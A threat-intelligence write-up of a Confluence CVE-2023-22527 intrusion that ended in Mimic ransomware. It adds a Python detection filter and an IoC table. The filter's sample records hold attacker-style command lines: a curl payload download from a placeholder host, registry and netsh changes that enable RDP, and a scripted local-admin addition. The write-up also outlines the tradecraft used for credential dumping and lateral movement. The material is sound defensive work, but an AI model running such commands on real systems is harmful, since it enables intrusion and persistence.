A significant security incident in late June 2024 demonstrates how an unpatched Atlassian Confluence server was leveraged as an initial access vector, resulting in attackers enabling Remote Desktop Protocol (RDP) access and facilitating broad remote code execution.
The threat actor exploited CVE-2023-22527, a template injection vulnerability in Confluence, to establish persistent, privileged access within the target organization’s network, ultimately deploying ransomware and impacting core IT infrastructure.

Attack Overview
The campaign began with reconnaissance and exploitation from multiple external IP addresses, notably 45.227.254[.]124 and 91.191.209[.]46.
The initial phase saw a proof-of-concept “whoami” execution, swiftly escalating to the deployment of a Metasploit Meterpreter payload via curl.
This established a C2 channel and enabled the threat actor to deliver additional tooling, including AnyDesk for persistent access.

Automation was evident, with repeated scripted actions: installation of AnyDesk, creation of local administrator accounts via batch scripts (notably “noname” with a hardcoded password), and registry modifications to enable RDP (fDenyTSConnections set to 0).
The intruder further manipulated firewall configurations using netsh advfirewall to guarantee unimpeded RDP connectivity.
Sustained efforts at privilege escalation were observed, with the attacker leveraging named pipe impersonation techniques, specifically the RPCSS variant, to achieve SYSTEM-level access.
According to the report, this enabled the creation of persistent local admin accounts and reinstallation of AnyDesk as a service, solidifying a long-term foothold.
Post-exploitation tooling included Mimikatz, ProcessHacker, and Impacket’s secretsdump.py, executed both for credential harvesting and lateral movement.
LSASS process memory dumps, NTLM hash extraction, and pass-the-hash authentication facilitated the compromise of domain administrator accounts.
The attacker attempted to escalate further using Zerologon (CVE-2020-1472), though this effort failed operationally.
Once domain-level credentials were secured, the adversary moved laterally using wmiexec, RDP, and SMB share creation. Network reconnaissance was carried out with SoftPerfect NetScan, enumerating key ports (445, 3389, etc.) and SMB shares.
The attacker leveraged Impacket tools for additional credential access and attempted, unsuccessfully, to exploit PrintNightmare (CVE-2021-34527).
The ability to pivot was further demonstrated through direct RDP sessions, initiated both manually and automatically via the NetScan GUI, targeting file and backup servers.
The attacker’s playbook included disabling Microsoft Defender using Defender Control (DC.exe), as well as using Process Hacker to tamper with defenses and processes ahead of ransomware deployment.

Ransomware Deployment
After approximately 62 hours of post-exploitation activity, the threat actor delivered and executed ELPACO-team.exe, a Mimic ransomware variant, across multiple high-value servers, including backup and file servers.
The payload was transferred over SMB and executed via RDP. The ransomware, packaged as a self-extracting 7-zip archive, encrypted files and established persistence by setting registry “Run” keys.
Unlike typical ransomware incidents, evidence suggests minimal data exfiltration, with less than 70 MB transferred externally, mostly tied to remote access operations.
The campaign concluded with the deletion of select event logs and the use of Notepad to inspect ransom notes, signaling end-of-attack activity.
Organizations operating Confluence should urgently patch known vulnerabilities, continuously monitor for suspicious child processes (especially from tomcat9.exe), and scrutinize anomalous RDP/firewall configuration changes for rapid detection and containment of similar campaigns.
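Detection logic for the recommendations above, added here as an example and not part of the original article or the underlying report: a Python filter run over constructed Sysmon-style process-creation records that flags shells or downloaders spawned by tomcat9.exe, registry writes setting fDenyTSConnections to 0, netsh advfirewall changes opening RDP, and scripted additions to the local Administrators group. The sample records, the rule names and the SUSPICIOUS_CHILDREN set are assumptions chosen for illustration.

```python
import re

# Constructed Sysmon-style records (parent image, image, command line); illustrative only.
SAMPLE_EVENTS = [
    ("C:\\Confluence\\jre\\bin\\tomcat9.exe", "C:\\Windows\\System32\\cmd.exe",
     "cmd.exe /c whoami"),
    ("C:\\Confluence\\jre\\bin\\tomcat9.exe", "C:\\Windows\\System32\\curl.exe",
     "curl.exe http://placeholder.invalid/x -o C:\\Temp\\x.exe"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\reg.exe",
     'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
     "/v fDenyTSConnections /t REG_DWORD /d 0 /f"),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\netsh.exe",
     'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'),
    ("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\net.exe",
     "net localgroup administrators noname /add"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe",
     "notepad.exe C:\\Users\\admin\\notes.txt"),
]
# Children a Confluence Tomcat service process has no legitimate reason to spawn (assumed set).
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe", "certutil.exe", "whoami.exe"}

def classify(parent, image, cmdline):
    """Return the names of the detection rules this record trips (empty if benign)."""
    parent_name = parent.rsplit("\\", 1)[-1].lower()
    child_name = image.rsplit("\\", 1)[-1].lower()
    cl = cmdline.lower()
    hits = []
    if parent_name == "tomcat9.exe" and child_name in SUSPICIOUS_CHILDREN:
        hits.append("confluence_spawned_shell_or_downloader")
    # reg.exe setting fDenyTSConnections to 0 turns RDP on.
    if "fdenytsconnections" in cl and re.search(r"/d\s+0\b", cl):
        hits.append("rdp_enabled_via_registry")
    # netsh advfirewall changes that open the Remote Desktop rule group or port 3389.
    if child_name == "netsh.exe" and "advfirewall" in cl and ("remote desktop" in cl or "3389" in cl):
        hits.append("firewall_opened_for_rdp")
    # Scripted additions to the local Administrators group.
    if child_name == "net.exe" and "localgroup administrators" in cl and "/add" in cl:
        hits.append("local_admin_added")
    return hits

def scan(events):
    """Return {command line: rule hits} for every record that tripped at least one rule."""
    findings = {}
    for parent, image, cmd in events:
        hits = classify(parent, image, cmd)
        if hits:
            findings[cmd] = hits
    return findings
```

On the constructed sample set, five of the six records trip a rule and only the Notepad launch is left untouched; in practice the same checks would be fed from Sysmon Event ID 1 or Windows Security 4688 telemetry.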

Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| IP Address | 45.227.254.124 | Attacker C2 / AnyDesk server |
| IP Address | 91.191.209.46 | Metasploit C2 / payload server |
| File | elpaco-team.exe | Ransomware payload |
| SHA256 | 0b83f2667abff814bb724808c404396e6ad417591165f1762a8e99ec108d4996 | svhostss.exe / ELPACO-team.exe |
| File | AnyDesk.exe | Remote desktop software, persistently installed by the attacker |
| File | HAHLGiDDb.exe | Metasploit shellcode loader |
| File | mimikatz.exe | Credential dumping tool |
| File | secretsdump.exe | Impacket credential dumping tool |
| Registry | HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections = 0 | RDP enabled |
| Registry | HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhostss | Ransomware persistence |
| User Account | noname / Crackenn | Created by the attacker for persistence |